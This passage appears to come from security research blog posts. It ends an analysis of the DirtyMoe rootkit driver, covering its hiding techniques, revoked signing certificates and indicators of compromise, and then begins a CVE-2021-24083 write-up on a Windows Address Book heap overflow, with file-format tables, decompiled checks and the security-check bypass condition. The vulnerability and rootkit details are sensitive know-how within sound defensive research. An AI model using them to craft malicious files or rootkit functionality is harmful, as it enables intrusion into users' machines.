The DirtyMoe service and loaded driver itself are hidden; however, the Windows Event Log system records information about started services. Therefore, we can get additional information such as ProcessID and ThreadID of all services, including the hidden services.

WinDbg connected to the Windows kernel can display all loaded modules using the lm command. The module list can uncover non-virtual drivers with prefix dump_ and identify the malicious drivers.

Offline connected volume can provide the DLL library of the services and other supporting files, which are unfortunately encrypted and obfuscated with VMProtect. Finally, the offline SYSTEM registry stores records of the DirtyMoe service.

4. Certificates

Windows Vista and later versions of Windows require loaded drivers to be code-signed. The digital code signature should verify the identity and integrity of the driver vendor [9]. However, Windows does not check the current status of all certificates in a driver's signing chain, so if one of the certificates in the path is expired or revoked, the driver is still loaded into the system. We will not discuss here why Windows loads drivers with invalid certificates, since this topic is really wide; backward compatibility as well as the potential impact on the kernel implementation play a role.

DirtyMoe drivers are signed with three certificates, as follows:

Beijing Kate Zhanhong Technology Co.,Ltd.
Valid From: 28-Nov-2013 (2:00:00)
Valid To: 29-Nov-2014 (1:59:59)
SN: 3C5883BD1DBCD582AD41C8778E4F56D9
Thumbprint: 02A8DC8B4AEAD80E77B333D61E35B40FBBB010A0
Revocation Status: Revoked on 22-May-2014 (9:28:59)

Beijing Founder Apabi Technology Limited
Valid From: 22-May-2018 (2:00:00)
Valid To: 29-May-2019 (14:00:00)
SN: 06B7AA2C37C0876CCB0378D895D71041
Thumbprint: 8564928AA4FBC4BBECF65B402503B2BE3DC60D4D
Revocation Status: Revoked on 22-May-2018 (2:00:01)

Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Valid From: 23-Mar-2011 (2:00:00)
Valid To: 23-Mar-2012 (1:59:59)
SN: 5F78149EB4F75EB17404A8143AAEAED7
Thumbprint: 31E5380E1E0E1DD841F0C1741B38556B252E6231
Revocation Status: Revoked on 18-Apr-2011 (10:42:04)

The certificates have been revoked by their certification authorities and are registered as stolen, leaked, misused, etc. [10]. Although all the certificates were revoked in the past, Windows still loads drivers signed with them because the root certificate authorities are marked as trusted.

5. Summarization and Discussion

We summarize the main functionality of the DirtyMoe driver. We discuss the quality of the driver implementation, anti-forensic mechanisms, and stolen certificates for successful driver loading.

5.1 Main Functionality

Authorization

The driver is controlled via IOCTL codes sent by malware processes in user-mode. However, the driver implements an authorization mechanism which verifies that the IOCTLs are sent by authenticated processes. Therefore, not every process can communicate with the driver.

Affecting the Filesystem

If a rootkit is in the kernel, it can do "anything". The DirtyMoe driver registers itself in the filter manager and begins to influence the results of filesystem I/O operations; in fact, it begins to filter the content of the filesystem. Furthermore, the driver replaces the NtfsCreatCallback() callback function of the NTFS driver, so it can determine which processes should gain access to the filesystem and which should not.

Thread Monitoring and Code injection

The DirtyMoe driver registers a malicious routine which is invoked whenever the system creates a new thread. The malicious routine abuses the APC kernel mechanism to execute the malicious code, which loads an arbitrary DLL into the new thread.

Registry Hiding

This technique abuses a hook of the kernel method that looks up registry keys in a HIVE. Code execution of the hooked method is redirected to a malicious routine so that the driver can control which registry keys are resolved; in effect, the driver can select which keys are visible and which are not.

Service and Driver Hiding

Patching specific kernel structures causes certain API functions to omit some system services or loaded drivers from their enumerations. Windows services and drivers are stored as double-linked lists in the kernel. The driver corrupts these kernel structures so that malicious services and drivers are unlinked from them. Consequently, when the kernel iterates over these structures for the purpose of enumeration, the malicious items are skipped.

5.2 Anti-Forensic Technique

As we mentioned above, the driver is able to hide itself. But before the driver loading, the DirtyMoe service must register the driver in the registry and dump the driver into a file. When the driver is loaded, the DirtyMoe service deletes all registry entries related to the driver loading, and the driver deletes its own file from the file system through kernel-mode. Therefore, the driver remains loaded in memory, but its file is gone.

The DirtyMoe service removes the registry entries via standard API calls. We can restore this data from the physical storage, since the API calls only remove the pointers from the HIVE. The dumped driver file, however, is never physically stored on the disk drive because its size is small and it is present only in the cache memory. Accordingly, the file is removed from the cache before the cache is flushed to disk, so we cannot restore the file from the physical disk.

5.3 Discussion

The whole driver serves as an all-in-one super-rootkit package. Any malware can register itself with the driver if it knows the authorization code. After successful registration, the malware can use the driver's wide range of functionality. Hypothetically, since the authorization code is hardcoded and the driver's name can be derived, we could communicate with the driver and stop it.

The system loads the driver via the DirtyMoe service within a few seconds. Moreover, the driver file is never physically present in the file system, only in the cache. The driver is loaded via an API call, and the DirtyMoe service keeps a handle to the driver file, so file manipulation with the driver file is limited. However, the driver then removes its own file using a kernel call. Therefore, the driver file is removed from the file system cache while the file handle remains open, with the difference that the driver file no longer exists, including its forensic traces.

The DirtyMoe malware is mostly written in Delphi; the driver, naturally, is coded in native C. The code style of the driver and of the rest of the malware is very different. Our analysis indicates that most of the driver functionality was taken from public samples posted on internet forums, and each part of the driver is written in a different style. The malware authors merged individual rootkit functionality into one kit, and in doing so also merged known bugs, so the driver shows a few significant symptoms of its presence in the system. The authors needed to adapt the functionality of the public samples to their purpose, but that has been done in a very dilettante way. It seems that the malware authors are familiar only with Delphi.

Finally, the code-signing certificates that are used were revoked in the middle of their validity period. However, the certificates are still widely used for code signing, so the private keys have probably been stolen or leaked. In addition, the stolen certificates were issued by certification authorities that Microsoft trusts, so drivers signed with them can be successfully loaded into the system despite the revocation. Moreover, the trend of misusing such certificates is growing, and predictions show that it will continue to grow in the future. We will analyze the problems of code-signing certificates in a future post.

6. Conclusion

The DirtyMoe driver is an advanced piece of rootkit that DirtyMoe uses to effectively hide malicious activity on host systems. This research was undertaken to inspect the rootkit functionality of the DirtyMoe driver and evaluate its impact on infected systems. This study set out to investigate and present an analysis of the DirtyMoe driver, namely its functionality, its ability to conceal itself, its deployment, and its code signature.

The research has shown that the driver provides key functionality to hide malicious processes, services, and registry keys. Another dangerous capability of the driver is the injection of malicious code into newly created processes. Moreover, the driver also implements a minifilter which monitors and affects I/O operations on the file system, so the content of the file system is filtered and selected files/directories can be hidden from users. An implication of this finding is that the malware itself and its artifacts are hidden even from AVs. More importantly, the driver implements another anti-forensic technique which removes the driver's evidence from disk and registry immediately after the driver is loaded. However, a few traces can still be found on the victim's machine.

This study has provided the first comprehensive review of the driver that protects and serves each malware service and process of the DirtyMoe malware. The scope of this study was limited in terms of driver functionality. Further experimental investigation is needed to hunt down and investigate other samples that have been signed with the revoked certificates; with that, the malware author could be traced and identified through the abused certificates.

IoCs

Samples (SHA-256)
550F8D092AFCD1D08AC63D9BEE9E7400E5C174B9C64D551A2AD19AD19C0126B1
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
B3B5FFF57040C801A4392DA2AF83F4BF6200C575AA4A64AB9A135B58AA516080
CB95EF8809A89056968B669E038BA84F708DF26ADD18CE4F5F31A5C9338188F9
EB29EDD6211836E6D1877A1658E648BEB749091CE7D459DBD82DC57C84BC52B1

References

[1] Kernel-Mode Driver Architecture
[2] Driver to Hide Processes and Files
[3] A piece of code to hide registry entries
[4] Hidden
[5] Opening Hacker’s Door
[6] Hiding loaded driver with DKOM
[7] Crashdmp-ster Diving the Windows 8 Crash Dump Stack
[8] Ghost drivers named dump_*.sys
[9] Driver Signing
[10] Australian web hosts hit with a Manic Menagerie of malware

Appendix A

Registry entries used in the Start Routine

\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceAddress
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNumber
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceId
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceName
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameOnly
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB_2


Appendix B

Example of registry entries configuring the driver

Key: ControlSet001\Control\WinApi
Value: WinDeviceAddress
Data: Ms312B9050App;   

Value: WinDeviceNumber
Data:
\WINDOWS\AppPatch\Ke601169.xsl;
\WINDOWS\AppPatch\Ke237043.xsl;
\WINDOWS\AppPatch\Ke311799.xsl;
\WINDOWS\AppPatch\Ke119163.xsl;
\WINDOWS\AppPatch\Ke531580.xsl;
\WINDOWS\AppPatch\Ke856583.xsl;
\WINDOWS\AppPatch\Ke999860.xsl;
\WINDOWS\AppPatch\Ke410472.xsl;
\WINDOWS\AppPatch\Ke673389.xsl;
\WINDOWS\AppPatch\Ke687417.xsl;
\WINDOWS\AppPatch\Ke689468.xsl;
\WINDOWS\AppPatch\Ac312B9050.sdb;
\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceName
Data:
C:\WINDOWS\AppPatch\Ac312B9050.sdb;
C:\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceId
Data: dump_FDC.sys;

The post DirtyMoe: Rootkit Driver appeared first on Avast Threat Labs.

Analysis of a Heap Buffer-Overflow Vulnerability in Microsoft Windows Address Book

By Eneko Cruz Elejalde

Overview

This post analyzes a heap-buffer overflow in Microsoft Windows Address Book. Microsoft released an advisory for this vulnerability for the February 2021 Patch Tuesday. This post will go into detail about what Microsoft Windows Address Book is, the vulnerability itself, and the steps to craft a proof-of-concept exploit that crashes the vulnerable application.

Windows Address Book

Windows Address Book is a part of the Microsoft Windows operating system and is a service that provides users with a centralized list of contacts that can be accessed and modified by both Microsoft and third party applications. The Windows Address Book maintains a local database and interface for finding and editing information about contacts, and can query network directory servers using Lightweight Directory Access Protocol (LDAP). The Windows Address Book was introduced in 1996 and was later replaced by Windows Contacts in Windows Vista and subsequently by the People App in Windows 10.

The Windows Address Book provides an API that enables other applications to directly use its database and user interface services to enable services to access and modify contact information. While Microsoft has replaced the application providing the Address Book functionality, newer replacements make use of old functionality and ensure backwards compatibility. The Windows Address Book functionality is present in several Windows Libraries that are used by Windows 10 applications, including Outlook and Windows Mail. In this way, modern applications make use of the Windows Address Book and can even import address books from older versions of Windows.

CVE-2021-24083

A heap-buffer overflow vulnerability exists within the SecurityCheckPropArrayBuffer() function within wab32.dll when processing nested properties of a contact. The network-based attack vector involves enticing a user to open a crafted .wab file containing a malicious composite property in a WAB record.

Vulnerability

The vulnerability analysis that follows is based on Windows Address Book Contacts DLL (wab32.dll) version 10.0.19041.388 running on Windows 10 x64.

The Windows Address Book Contacts DLL (i.e. wab32.dll) provides access to the Address Book API and is used by multiple applications to interact with the Windows Address Book. The Contacts DLL handles operations related to contact and identity management. Among others, the Contacts DLL is able to import an address book (i.e., a WAB file) exported from an earlier version of the Windows Address Book.

Earlier versions of the Windows Address Book maintained a database of identities and contacts in the form of a .wab file. While current versions of Windows do not use a .wab file by default anymore, they allow importing a WAB file from an earlier installation of the Windows Address Book.

There are multiple ways of importing a WAB file into the Windows Address Book, but it was observed that applications rely on the Windows Contacts Import Tool (i.e., C:\Program Files\Windows Mail\wabmig.exe) to import an address book. The Import Tool loads wab32.dll to handle loading a WAB file, extracting the relevant contacts, and importing them into the Windows Address Book.

WAB File Format

The WAB file format (commonly known as Windows Address Book or Outlook Address Book) is an undocumented and proprietary file format that contains personal identities. Identities may in turn contain contacts, and each contact might contain one or more properties.

Although the format is undocumented, the file-format has been partially reverse-engineered by a third party. The following structures were obtained from a combination of a publicly available third-party application and the disassembly of wab32.dll. Consequently, there may be inaccuracies in structure definitions, field names, and field types.

The WAB file has the following structure:

Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -------------------
0x0         16                Magic Number            Sixteen magic bytes
0x10        4                 Count 1                 Unknown Integer
0x14        4                 Count 2                 Unknown Integer
0x18        16                Table Descriptor 1      Table descriptor
0x28        16                Table Descriptor 2      Table descriptor
0x38        16                Table Descriptor 3      Table descriptor
0x48        16                Table Descriptor 4      Table descriptor
0x58        16                Table Descriptor 5      Table descriptor
0x68        16                Table Descriptor 6      Table descriptor

All multi-byte fields are represented in little-endian byte order unless otherwise specified. All string fields are Unicode strings encoded in UTF-16LE format.

The Magic Number field contains the following sixteen bytes: 9c cb cb 8d 13 75 d2 11 91 58 00 c0 4f 79 56 a4. While some sources list the sequence of bytes 81 32 84 C1 85 05 D0 11 B2 90 00 AA 00 3C F6 76 as a valid magic number for a WAB file, it was found experimentally that replacing the sequence of bytes prevents the Windows Address Book from processing the file.

Each of the six Table Descriptor fields numbered 1 through 6 has the following structure:

Offset    Length    Field    Description
          (bytes)
-------   --------  -------  -------------------
0x0       4         Type     Type of table descriptor
0x4       4         Size     Size of the record described
0x8       4         Offset   Offset of the record described relative to the beginning of file
0xC       4         Count    Number of records present at offset

The following are examples of some known types of table descriptor:

  • Text Record (Type: 0x84d0): A record containing a Unicode string.
  • Index Record (Type: 0xFA0): A record that may contain several descriptors to WAB records.

Each text record has the following structure:

Offset   Length (bytes)    Field          Description
------   --------------    ------------   -------------------
0x0      N                 Content        Text content of the record; a null terminated UNICODE string
0x0+N    0x4               RecordId       A record identifier for the text record 

Similarly, each index record has the following structure:

Offset      Length (bytes)    Field        Description
---------   --------------    ----------   -------------------
0x0         4                 RecordId     A record identifier for the index record
0x4         4                 Offset       Offset of the record relative to the beginning of the file

Each entry in the index record (i.e., each index record structure in succession) has an offset that points to a WAB record.
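
To make the preceding layout easier to follow, the following C-style sketch collects the file header, table descriptor, and index record entry into structures. It is illustrative only: the field names and types are assumptions derived from the partially reverse-engineered tables above rather than an official definition, and the variable-length text record is omitted.

    #include <cstdint>

    #pragma pack(push, 1)
    // Table descriptor (six of these follow the header fields).
    struct WabTableDescriptor {
      uint32_t Type;    // Type of table descriptor, e.g. 0x84d0 (text) or 0xFA0 (index)
      uint32_t Size;    // Size of the record described
      uint32_t Offset;  // Offset of the record, relative to the beginning of the file
      uint32_t Count;   // Number of records present at Offset
    };

    // WAB file header (0x78 bytes in total).
    struct WabFileHeader {
      uint8_t Magic[16];                  // 9c cb cb 8d 13 75 d2 11 91 58 00 c0 4f 79 56 a4
      uint32_t Count1;                    // Unknown integer
      uint32_t Count2;                    // Unknown integer
      WabTableDescriptor Descriptors[6];  // Table descriptors 1 through 6
    };

    // One entry of an index record; Offset points to a WAB record.
    struct WabIndexRecordEntry {
      uint32_t RecordId;  // Record identifier for the index record
      uint32_t Offset;    // Offset of the WAB record, relative to the beginning of the file
    };
    #pragma pack(pop)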

WAB Records

A WAB record is used to describe a contact. It contains fields such as email addresses and phone numbers stored in properties, which may be of various types such as string, integer, GUID, and timestamp. Each WAB record has the following structure:

Offset      Length   Field              Description
---------   ------   ---------------    -------------------
0x0         4        Unknown1           Unknown field
0x4         4        Unknown2           Unknown field
0x8         4        RecordId           A record identifier for the WAB record
0xC         4        PropertyCount      The number of properties contained in RecordProperties
0x10        4        Unknown3           Unknown field 
0x14        4        Unknown4           Unknown field 
0x18        4        Unknown5           Unknown field 
0x1C        4        DataLen            The length of the RecordProperties field (M)
0x20        M        RecordProperties   Succession of subproperties belonging to the WAB record

The following fields are relevant:

  • The RecordProperties field is a succession of record property structures.
  • The PropertyCount field indicates the number of properties within the RecordProperties field.

Record properties can be either simple or composite.

Simple Properties

Simple properties have the following structure:

Offset      Length (bytes)    Field       Description
---------   --------------    ---------   -------------------
0x0         0x2               Tag         A property tag describing the type of the contents
0x2         0x2               Unknown     Unknown field
0x4         0x4               Size        Size in bytes of Value member (X)
0x8         X                 Value       Property value or content

Tags of simple properties are smaller than 0x1000, and include the following:

Tag Name        Tag Value    Length      Description
                             (bytes)
---------       -----------  ---------   -------------------
PtypInteger16   0x00000002   2           A 16-bit integer
PtypInteger32   0x00000003   4           A 32-bit integer
PtypFloating32  0x00000004   4           A 32-bit floating point number
PtypFloating64  0x00000005   8           A 64-bit floating point number
PtypBoolean     0x0000000B   2           Boolean, restricted to 1 or 0
PtypString8     0x0000001E   Variable    A string of multibyte characters in externally specified
                                         encoding with terminating null character (single 0 byte)
PtypBinary      0x00000102   Variable    A COUNT field followed by that many bytes
PtypString      0x0000001F   Variable    A string of Unicode characters in UTF-16LE format encoding
                                         with terminating null character (0x0000).
PtypGuid        0x00000048   16          A GUID with Data1, Data2, and Data3 fields in little-endian
PtypTime        0x00000040   8           A 64-bit integer representing the number of 100-nanosecond
                                         intervals since January 1, 1601
PtypErrorCode   0x0000000A   4           A 32-bit integer encoding error information

Note the following:

  • The aforementioned list is not exhaustive. For more property tag definitions, see this.
  • The value of PtypBinary is prefixed by a COUNT field, which counts 16-bit words.
  • In addition to the above, the following properties also exist; their usage in WAB is unknown.
    • PtypEmbeddedTable (0x0000000D): The property value is a Component Object Model (COM) object.
    • PtypNull (0x00000001): None: This property is a placeholder.
    • PtypUnspecified (0x00000000): Any: this property type value matches any type.

Composite Properties

Composite properties have the following structure:

Offset  Length     Field             Description
        (bytes)
------  ---------  ----------------- -------------------
0x0     0x2        Tag               A property tag describing the type of the contents
0x2     0x2        Unknown           Unknown field
0x4     0x4        NestedPropCount   Number of nested properties contained in the current WAB property
0x8     0x4        Size              Size in bytes of Value member (X)
0xC     X          Value             Property value or content
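
For reference, the two property headers can be sketched as plain structures (illustrative only; the field names follow the tables above, and each header is immediately followed by Size bytes of Value data):

    #include <cstdint>

    #pragma pack(push, 1)
    // Header of a simple property (tag < 0x1000), followed by Size bytes of Value.
    struct WabSimplePropertyHeader {
      uint16_t Tag;      // Property tag describing the type of the contents
      uint16_t Unknown;  // Unknown field
      uint32_t Size;     // Size in bytes of the Value member
    };

    // Header of a composite property (tag >= 0x1000), followed by Size bytes of Value.
    struct WabCompositePropertyHeader {
      uint16_t Tag;              // Property tag describing the type of the contents
      uint16_t Unknown;          // Unknown field
      uint32_t NestedPropCount;  // Number of nested properties contained in Value
      uint32_t Size;             // Size in bytes of the Value member
    };
    #pragma pack(pop)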

Tags of composite properties are greater than or equal to 0x1000, and include the following:

Tag Name                Tag Value
---------               ----------
PtypMultipleInteger16   0x00001002
PtypMultipleInteger32   0x00001003
PtypMultipleString8     0x0000101E
PtypMultipleBinary      0x00001102
PtypMultipleString      0x0000101F
PtypMultipleGuid        0x00001048
PtypMultipleTime        0x00001040


The Value field of each composite property contains NestedPropCount number of Simple properties of the corresponding type.

In the case of fixed-size properties (PtypMultipleInteger16, PtypMultipleInteger32, PtypMultipleGuid, and PtypMultipleTime), the Value field of a composite property contains NestedPropCount instances of the Value field of the corresponding simple property.

For example, in a PtypMultipleInteger32 structure with NestedPropCount of 4:

  • The Size is always 16.
  • The Value contains four 32-bit integers.

In the case of variable-size properties (PtypMultipleString8, PtypMultipleBinary, and PtypMultipleString), the Value field of the composite property contains NestedPropCount pairs of the Size and Value fields of the corresponding simple property.

For example, in a PtypMultipleString structure with NestedPropCount of 2 containing the strings “foo” and “bar” in Unicode:

  • The Size is 14 00 00 00.
  • The Value field contains a concatenation of the following two byte-strings:
    • “foo” encoded with a four-byte length: 06 00 00 00 66 00 6f 00 6f 00.
    • “bar” encoded with a four-byte length: 06 00 00 00 62 00 61 00 72 00.
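
As a quick sanity check of that layout, the sketch below serializes the Value field of a PtypMultipleString composite property exactly as described: each nested string is written as a 4-byte length followed by its UTF-16LE bytes, without a terminator. For "foo" and "bar" this produces the 0x14 bytes listed above (the sketch assumes a little-endian host).

    #include <cstdint>
    #include <string>
    #include <vector>

    // Serialize the Value field of a PtypMultipleString composite property:
    // for each nested string, a 4-byte byte-length followed by the UTF-16LE
    // bytes of the string (no terminating null). Assumes a little-endian host.
    std::vector<uint8_t> SerializeMultipleStringValue(
        const std::vector<std::u16string> &Strings) {
      std::vector<uint8_t> Value;
      for (const auto &S : Strings) {
        const uint32_t ByteLen = uint32_t(S.size() * sizeof(char16_t));
        const auto *LenBytes = reinterpret_cast<const uint8_t *>(&ByteLen);
        Value.insert(Value.end(), LenBytes, LenBytes + sizeof(ByteLen));
        const auto *StrBytes = reinterpret_cast<const uint8_t *>(S.data());
        Value.insert(Value.end(), StrBytes, StrBytes + ByteLen);
      }
      return Value;
    }

    // SerializeMultipleStringValue({u"foo", u"bar"}).size() == 0x14, matching
    // the Size of 14 00 00 00 given in the example above.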

Technical Details

The vulnerability in question occurs when a malformed Windows Address Book in the form of a WAB file is imported. When a user attempts to import a WAB file into the Windows Address Book, the method WABObjectInternal::Import() is called, which in turn calls ImportWABFile(). For each contact inside the WAB file, ImportWABFile() performs the following nested calls: ImportContact(), CWABStorage::ReadRecord(), ReadRecordWithoutLocking(), and finally HrGetPropArrayFromFileRecord(). The latter function receives a pointer to a file as an argument, reads the contact header, and extracts PropertyCount and DataLen. HrGetPropArrayFromFileRecord() in turn calls SecurityCheckPropArrayBuffer() to perform security checks upon the imported file and HrGetPropArrayFromBuffer() to read the contact properties into a property array.

The function HrGetPropArrayFromBuffer() relies heavily on the correctness of the checks performed by SecurityCheckPropArrayBuffer(). However, the latter fails to implement security checks for certain property types. Specifically, SecurityCheckPropArrayBuffer() may skip checking the contents of nested properties when the property tag is unknown, while HrGetPropArrayFromBuffer() continues to process all nested properties regardless of the security check. As a result, it is possible to trick HrGetPropArrayFromBuffer() into parsing an unchecked contact property and, while parsing such a property, into overflowing a heap buffer.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference markers denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

The following is the pseudocode of the function HrGetPropArrayFromFileRecord:

[1]

if ( !(unsigned int)SecurityCheckPropArrayBuffer(wab_buffer_full, HIDWORD(uBytes[1]), wab_buffer[3]) )
  {

[2]
    result = 0x8004011b;        // Error
    goto LABEL_25;              // Return prematurely
  }

[3]
  result = HrGetPropArrayFromBuffer(wab_buffer_full, HIDWORD(uBytes[1]), wab_buffer[3], 0, a7);

At [1] the function SecurityCheckPropArrayBuffer() is called to perform a series of security checks upon the received buffer and the properties contained within. If the check passes, the input is trusted and processed by calling HrGetPropArrayFromBuffer() at [3]. Otherwise, the function returns with an error at [2].

The following is the pseudocode of the function SecurityCheckPropArrayBuffer():

    __int64 __fastcall SecurityCheckPropArrayBuffer(unsigned __int8 *buffer_ptr, unsigned int buffer_length, int header_dword_3)
    {
      unsigned int security_check_result; // ebx
      unsigned int remaining_buffer_bytes; // edi
      int l_header_dword_3; // er15
      unsigned __int8 *ptr_to_buffer; // r9
      int current_property_tag; // ecx
      __int64 c_dword_2; // r8
      unsigned int v9; // edi
      int VA; // ecx
      int VB; // ecx
      int VC; // ecx
      int VD; // ecx
      int VE; // ecx
      int VF; // ecx
      int VG; // ecx
      int VH; // ecx
      signed __int64 res; // rax
      _DWORD *ptr_to_dword_1; // rbp
      unsigned __int8 *ptr_to_dword_0; // r14
      unsigned int dword_2; // eax
      unsigned int v22; // edi
      int v23; // esi
      int v24; // ecx
      unsigned __int8 *c_ptr_to_property_value; // [rsp+60h] [rbp+8h]
      unsigned int v27; // [rsp+68h] [rbp+10h]
      unsigned int copy_dword_2; // [rsp+70h] [rbp+18h]

      security_check_result = 0;
      remaining_buffer_bytes = buffer_length;
      l_header_dword_3 = header_dword_3;
      ptr_to_buffer = buffer_ptr;
      if ( header_dword_3 )                      
      {
        while ( remaining_buffer_bytes > 4 )        
        {

[4]

          if ( *(_DWORD *)ptr_to_buffer & 0x1000 )  
          {

[5]

            current_property_tag = *(unsigned __int16 *)ptr_to_buffer;
            if ( current_property_tag == 0x1102 ||                    
                 (unsigned int)(current_property_tag - 0x101E) <= 1 ) 
            {                         

[6]
                                      
              ptr_to_dword_1 = ptr_to_buffer + 4;                     
              ptr_to_dword_0 = ptr_to_buffer;
              if ( remaining_buffer_bytes < 0xC )                     
                return security_check_result;                         
              dword_2 = *((_DWORD *)ptr_to_buffer + 2);
              v22 = remaining_buffer_bytes - 0xC;
              if ( dword_2 > v22 )                                     
                return security_check_result;                         
              ptr_to_buffer += 12;
              copy_dword_2 = dword_2;
              remaining_buffer_bytes = v22 - dword_2;
              c_ptr_to_property_value = ptr_to_buffer;                
              v23 = 0;                                                
              if ( *ptr_to_dword_1 > 0u )
              {
                while ( (unsigned int)SecurityCheckSingleValue(
                                        *(_DWORD *)ptr_to_dword_0,
                                        &c_ptr_to_property_value,
                                        &copy_dword_2) )
                {
                  if ( (unsigned int)++v23 >= *ptr_to_dword_1 )       
                  {                                                   
                    ptr_to_buffer = c_ptr_to_property_value;
                    goto LABEL_33;
                  }
                }
                return security_check_result;
              }
            }
            else                                                         
            {
             
[7]

              if ( remaining_buffer_bytes < 0xC )
                return security_check_result;
              c_dword_2 = *((unsigned int *)ptr_to_buffer + 2);       
              v9 = remaining_buffer_bytes - 12;
              if ( (unsigned int)c_dword_2 > v9 )                     
                return security_check_result;                         
              remaining_buffer_bytes = v9 - c_dword_2;
              VA = current_property_tag - 0x1002;                     
              if ( VA )
              {
                VB = VA - 1;
                if ( VB && (VC = VB - 1) != 0 )
                {
                  VD = VC - 1;
                  if ( VD && (VE = VD - 1) != 0 && (VF = VE - 1) != 0 && (VG = VF - 13) != 0 && (VH = VG - 44) != 0 )
                    res = VH == 8 ? 16i64 : 0i64;
                  else
                    res = 8i64;
                }
                else
                {
                  res = 4i64;
                }
              }
              else
              {
                res = 2i64;
              }
              if ( (unsigned int)c_dword_2 / *((_DWORD *)ptr_to_buffer + 1) != res ) 
                return security_check_result;                                        
                                                                                     

              ptr_to_buffer += c_dword_2 + 12;
            }
          }
          else                                     
          {                                        

[8]

            if ( remaining_buffer_bytes < 4 )       
              return security_check_result;
            v24 = *(_DWORD *)ptr_to_buffer;         
            c_ptr_to_property_value = ptr_to_buffer + 4;// new exe: v13 = buffer_ptr + 4;
            v27 = remaining_buffer_bytes - 4;       
            if ( !(unsigned int)SecurityCheckSingleValue(v24, &c_ptr_to_property_value, &v27) )
              return security_check_result;
            remaining_buffer_bytes = v27;
            ptr_to_buffer = c_ptr_to_property_value;
          }
    LABEL_33:
          if ( !--l_header_dword_3 )
            break;
        }
      }
      if ( !l_header_dword_3 )
        security_check_result = 1;
      return security_check_result;
    }

At [4], the tag of the property being processed is checked. The checks performed depend on whether the property processed in each iteration is a simple or a composite property. For simple properties (i.e., properties with a tag lower than 0x1000), execution continues at [8]. The following checks are done for simple properties:

  1. If the remaining number of bytes in the buffer is fewer than 4, the function returns with an error.
  2. A pointer to the property value is obtained and SecurityCheckSingleValue() is called to perform a security check upon the simple property and its value. SecurityCheckSingleValue() performs a security check and increments the pointer to point at the next property in the buffer, so that SecurityCheckPropArrayBuffer() can check the next property on the next iteration.
  3. The number of total properties is decremented and compared to zero. If equal to zero, then the function returns successfully. If different, the next iteration of the loop checks the next property.

Similarly, for composite properties (i.e., properties with a tag equal to or higher than 0x1000), execution continues at [5] and the following is done.

For variable-length composite properties (i.e., if the property tag is 0x1102 (PtypMultipleBinary), 0x101E (PtypMultipleString8), or 0x101F (PtypMultipleString)), the code at [6] does the following:

  1. The number of bytes left to read in the buffer is compared with 0xC to avoid overrunning the buffer.
  2. The Size field of the property is compared to the remaining buffer length to avoid overrunning the buffer.
  3. For each nested property, the function SecurityCheckSingleValue() is called. It:
    1. Performs a security check on the nested property.
    2. Advances the pointer to the buffer held by the caller, in order to point to the next nested property.
  4. The loop runs until the number of total properties in the contact (decremented in each iteration) is zero.

For fixed-length composite properties (i.e., composite properties whose tag is different from 0x1102 (PtypMultipleBinary), 0x101E (PtypMultipleString8), and 0x101F (PtypMultipleString)), the following happens starting at [7]:

  1. The number of bytes left to read in the buffer is compared with 0xC to avoid overrunning the buffer.
  2. The Size is compared to the remaining buffer length to avoid overrunning the buffer.
  3. The size of each nested property, which depends only on the property tag, is calculated from the parent property tag.
  4. The Size is divided by NestedPropCount to obtain the size of each nested property.
  5. The function returns with an error if the calculated subproperty size is different from the property size deduced from parent property tag.
  6. The buffer pointer is incremented by the size of the parent property value to point to the next property.

Unknown or non-processable property types are assigned the nested property size 0x0.

It was observed that if the calculated per-property size is zero, the buffer pointer is still advanced by the size of the property value as described by the header. Because the buffer is advanced regardless of the calculated size, the security check leaves the value of the parent property (which may include subproperties) unchecked. For an unknown or non-processable tag, the security check only passes if the result of the division performed in step 4 is zero; therefore, NestedPropCount must be larger than Size. Note that since any property occupies at least two bytes, NestedPropCount can never exceed half of Size in a well-formed file, so this division is never zero in benign cases.
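
A small sketch makes the bypass condition concrete. The element-size mapping below mirrors the res computation in the pseudocode above (2, 4, 8, or 16 bytes for the known fixed-size tags, 0 for anything else); the helper names are illustrative, and the sketch adds a zero-divisor guard that the decompiled code above does not show.

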